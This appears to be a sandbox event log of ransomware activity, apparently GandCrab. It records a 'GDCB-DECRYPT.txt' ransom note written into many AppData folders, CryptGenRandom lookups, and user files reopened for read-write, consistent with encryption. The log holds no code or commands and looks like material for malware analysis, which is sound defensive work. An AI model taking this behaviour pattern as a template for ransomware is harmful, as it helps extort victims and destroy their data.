File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0_32\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Credentials\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Event Viewer\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds Cache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\FORMS\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\GameDVR\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\GameDVR\KnownGameList.bin, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\GameDVR\KnownGameList.bin, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Media Player\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\16.0\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\OTele\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneDrive\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneNote\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\OneNote\16.0\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Outlook\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Outlook\Gliding\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\PlayReady\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\TaskSchedulerConfig\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\TokenBroker\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Vault\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Vault\UserProfileRoaming\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Visio\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Visio\content16.dat, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Visio\content16.dat, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\0\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\1024\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\1033\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\ActionCenterCache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\AppCache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Application Shortcuts\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Burn\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Caches\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Explorer\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\GameExplorer\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\History\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\IECompatCache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\IECompatUaCache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\IEDownloadHistory\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\INetCache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\INetCookies\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Notifications\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\PowerShell\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\PRICache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Ringtones\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\RoamingTiles\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Shell\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Temporary Internet Files\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\UsrClass.dat, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\UsrClass.dat, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\WebCache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Windows Anytime Upgrade\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\WinX\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Live\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\MicrosoftEdge\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\MicrosoftEdge\SharedCacheContainers\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\MicrosoftEdge\User\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\updates\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\updates\E7CF176E110C211B\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.3DBuilder_8wekyb3d8bbwe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Appconnector_8wekyb3d8bbwe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.BingFinance_8wekyb3d8bbwe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.BingNews_8wekyb3d8bbwe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.BingSports_8wekyb3d8bbwe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.LockApp_cw5n1h2txyewy\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
